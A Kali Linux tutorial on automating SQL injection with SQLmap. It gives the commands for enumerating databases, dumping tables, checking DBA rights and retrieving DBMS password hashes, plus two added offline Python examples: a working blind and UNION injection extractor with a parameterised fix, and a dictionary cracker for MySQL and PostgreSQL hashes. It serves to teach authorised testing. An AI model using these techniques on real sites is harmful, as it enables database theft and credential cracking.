Linux Network Security Web

SQLmap – Exploit SQL injection – Kali Linux

According to OWASP, injection flaws, with SQL injection the most common of them, rank among the top 10 most critical web application risks. In this tutorial we show how to automate a SQL injection attack with the popular tool SQLmap, run against a test site that you own or are authorised to test. The examples use GET-based injection, where the injectable parameter sits in the URL query string. SQLmap can also run a dictionary attack against any password hashes it retrieves from the database. SQLmap comes preinstalled in Kali Linux; on other distros such as Debian, Ubuntu or Arch it is available from the official repositories.

SQLmap is a terminal-based application, so open a terminal and run sqlmap --version to check whether it is already installed.

Install SQLmap

Debian and Ubuntu based distros

#sudo apt-get install sqlmap

Arch based distros

#sudo pacman -S sqlmap

(-S installs from the sync repositories. Do not use -Sy or -Syy together with a package name: that refreshes the package database without a full system upgrade and can leave the system partially upgraded.)

Red Hat based distros (Fedora, CentOS, RHEL)

#sudo dnf install sqlmap

(On older releases the command is yum install sqlmap. On RHEL and CentOS the package comes from the EPEL repository, which has to be enabled first.)

Once SQLmap is installed, all you need is a vulnerable target you are permitted to test in order to see it at work.

SQL injection using SQLmap

The basic command is simple: sqlmap, then -u followed by the target URL including its query string, so that the parameter you suspect is injectable (for example ?id=1) is part of the URL. By default sqlmap tests every GET parameter in the URL; add -p parameter-name to restrict testing to a single parameter.

#sqlmap -u "url"

This command tests the target and reports whether it is injectable. If it is, sqlmap prints each injectable parameter together with the injection techniques that worked against it (boolean-based blind, error-based, UNION query, stacked queries, time-based blind), the payload it used for each, and a fingerprint of the back-end DBMS. To extract data, first get the list of databases available on the target.

#sqlmap -u "url" --dbs

The --dbs option lists every database on the target if it is vulnerable to SQL injection. Once you have that list, the next step is to list the tables of the database you are interested in.

#sqlmap -u "url" --tables -D database-name

Here --tables lists all tables in the selected database, and -D names the database you found in the previous step. Next, list the columns of the table you want.

#sqlmap -u "url" --columns -D database-name -T table-name 

The --columns option tells sqlmap to retrieve the names of all columns, and the additional -T argument specifies the table whose columns you want listed.

Once you have the column names you can either dump the whole table or dump only selected columns with -C column1,column2. Besides showing the data on screen, sqlmap saves every dump as a CSV file under its output directory, whose path it prints at the end of the run.

#sqlmap -u "url" --dump -D database-name -T table-name

This tells sqlmap to dump every row of table-name in database-name.

You can also dump every table of a database with the following command (use --dump-all instead to dump every database the DBMS user can read):

#sqlmap -u "url" --dump -D database-name
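To see what sqlmap is actually doing behind --dbs, --tables and --dump, here is an added example (it is not from the page and not sqlmap's own code). It models a GET handler that pastes the id parameter into its SQL, exactly the kind of page sqlmap targets, then recovers the table names and a password through the same boolean-based blind technique sqlmap uses, and shows the parameterised handler that closes the hole. The database uses SQLite in memory, so it runs offline; the table layout, sample rows, function names and the 'widget' marker string are all constructed for this example.

```python
import sqlite3


def build_db():
    """Constructed sample database: a products table behind the page and a users table to steal."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users(id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO users VALUES (1, 'admin', 's3cr3t'), (2, 'bob', 'hunter2');
        CREATE TABLE products(id INTEGER PRIMARY KEY, name TEXT);
        INSERT INTO products VALUES (1, 'widget'), (2, 'gadget');
    """)
    return conn


def product_vulnerable(conn, id_param):
    """Models page.php?id=...: the raw parameter is concatenated into the query (injectable)."""
    sql = "SELECT name FROM products WHERE id=" + id_param
    return [row[0] for row in conn.execute(sql)]


def product_safe(conn, id_param):
    """Hardened handler: validate the type, then bind the value as a query parameter."""
    try:
        product_id = int(id_param)
    except ValueError:
        return []  # anything that is not an integer is rejected outright
    sql = "SELECT name FROM products WHERE id=?"
    return [row[0] for row in conn.execute(sql, (product_id,))]


def make_oracle(conn):
    """Boolean-based blind oracle: true iff the page still shows 'widget' for id=1 AND (cond).
    sqlmap builds the same kind of oracle by comparing page content for true/false payloads."""
    def oracle(cond):
        return product_vulnerable(conn, "1 AND (" + cond + ")") == ["widget"]
    return oracle


def blind_extract(oracle, expr, max_len=32):
    """Recover the string value of a scalar SQL expression without ever seeing it in a response:
    first its length, then every character by binary search over printable ASCII
    (about seven oracle queries, i.e. HTTP requests, per character)."""
    length = 0
    for n in range(1, max_len + 1):
        if oracle("length((%s))=%d" % (expr, n)):
            length = n
            break
    result = ""
    for i in range(1, length + 1):
        lo, hi = 32, 126
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle("unicode(substr((%s),%d,1))>%d" % (expr, i, mid)):
                lo = mid + 1
            else:
                hi = mid
        result += chr(lo)
    return result


def enumerate_tables(oracle):
    """Equivalent of --tables on SQLite: count the tables in sqlite_master, then read each name."""
    count_expr = "SELECT count(*) FROM sqlite_master WHERE type='table'"
    count = int(blind_extract(oracle, count_expr))
    names = []
    for offset in range(count):
        name_expr = "SELECT name FROM sqlite_master WHERE type='table' LIMIT 1 OFFSET %d" % offset
        names.append(blind_extract(oracle, name_expr))
    return names


if __name__ == "__main__":
    conn = build_db()
    oracle = make_oracle(conn)
    # UNION-based dump: one request pulls the whole users table when results are echoed back
    print("UNION dump:", product_vulnerable(conn, "0 UNION ALL SELECT username||':'||password FROM users"))
    # Blind enumeration: works even when nothing from the query is reflected in the page
    print("tables via blind:", enumerate_tables(oracle))
    print("admin password via blind:", blind_extract(oracle, "SELECT password FROM users WHERE username='admin'"))
    print("hardened handler given a payload:", product_safe(conn, "1 AND 1=1"))
```

On a real target each oracle call is an HTTP request and the true/false decision comes from comparing response bodies, which is why blind enumeration of a large schema is slow and why sqlmap prefers UNION or error-based extraction when the page echoes query results. Note that conn.execute refuses a second statement, so stacked queries (id=1; DROP TABLE ...) fail here just as they do against many real drivers.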

Check whether the current user is a database administrator

To find out which DBMS account the web application connects with, and whether that account has administrator privileges, run:

#sqlmap -u "url" -o -b --current-user --is-dba

Here -b retrieves the DBMS banner (version string), --current-user shows the account the application uses, --is-dba reports whether that account is a DBA, and -o turns on sqlmap's optimisation switches to speed the run up.

If that account is a DBA, or is otherwise allowed to read the DBMS system tables, you can retrieve the password hashes of every DBMS user with the following command. Note that the option is --passwords (plural), and -v 1 sets the verbosity level.

#sqlmap -u "url" -v 1 --current-user --passwords

SQLmap on a list of targets

sqlmap is a very flexible tool. You can give it any number of targets in a text file, one URL per line, and it will test them one after the other.

#sqlmap -m "path-to-file" --batch 

Here --batch makes sqlmap run non-interactively, answering every prompt with its default, which is what you want for an unattended run over many targets.

SQLmap also has password cracking capability: when --passwords returns hashes, it offers to run a dictionary attack against them with its bundled wordlist or one you supply. How long this takes depends on the number of hashes, the size of the wordlist and your CPU.
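The dictionary attack sqlmap offers after --passwords, as an added example that is not the page's or sqlmap's own code. It computes the two hash formats most often seen in that output, the MySQL 4.1+ PASSWORD() format ('*' plus uppercase hex of SHA1(SHA1(password))) and the PostgreSQL md5 format ('md5' plus md5(password || username)), and runs a small wordlist with a few mangling rules against a set of hashes. The usernames, passwords, wordlist and mangling rules are all constructed for the example; the sample hashes are generated with the same functions, since no real database is available offline.

```python
import hashlib


def mysql_hash(password):
    """MySQL 4.1+ PASSWORD() format: '*' followed by uppercase hex of SHA1(SHA1(password)).
    There is no salt, so one candidate hash can be compared against every user at once."""
    inner = hashlib.sha1(password.encode("utf-8")).digest()
    return "*" + hashlib.sha1(inner).hexdigest().upper()


def postgres_md5_hash(password, username):
    """PostgreSQL md5 format: 'md5' + md5(password || username); the username acts as the salt."""
    return "md5" + hashlib.md5((password + username).encode("utf-8")).hexdigest()


def candidates(word):
    """Mangling rules applied to each wordlist entry (assumed rules, chosen for illustration)."""
    yield word
    yield word.capitalize()
    yield word.upper()
    for suffix in ("1", "123", "!"):
        yield word + suffix
        yield word.capitalize() + suffix


def crack(user_hashes, wordlist):
    """Dictionary attack over {username: hash}, the shape of what --passwords returns.
    The format is detected from the hash prefix; returns {username: password} for every hit."""
    found = {}
    for username, digest in user_hashes.items():
        for word in wordlist:
            for cand in candidates(word):
                if digest.startswith("*"):
                    hit = mysql_hash(cand) == digest
                elif digest.startswith("md5"):
                    hit = postgres_md5_hash(cand, username) == digest
                else:
                    hit = False  # unknown format: leave it for a dedicated cracker
                if hit:
                    found[username] = cand
                    break
            if username in found:
                break
    return found


# Constructed sample: the kind of table --passwords prints, for two MySQL accounts and one PostgreSQL account
SAMPLE_HASHES = {
    "root": mysql_hash("Summer123"),
    "app": mysql_hash("welcome!"),
    "postgres": postgres_md5_hash("Password1", "postgres"),
}
SAMPLE_WORDLIST = ["password", "summer", "welcome", "letmein"]


if __name__ == "__main__":
    for user, digest in SAMPLE_HASHES.items():
        print("%s: %s" % (user, digest))
    print("cracked:", crack(SAMPLE_HASHES, SAMPLE_WORDLIST))
```

Because the MySQL format is unsalted, a real cracker hashes each candidate once and looks it up against all hashes; the per-user loop above is only there to keep the salted PostgreSQL case in the same code path. Hashes that survive a wordlist plus rules are better handed to a GPU cracker than left running on the CPU.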

You can also read about other security testing tools here:

Best Vulnerability assessment tools and techniques


About the author

Ajay Verma

A Computer Science graduate who works extensively on open source projects. His areas of interest are network security, Linux administration, FOSS, Python, and C programming.
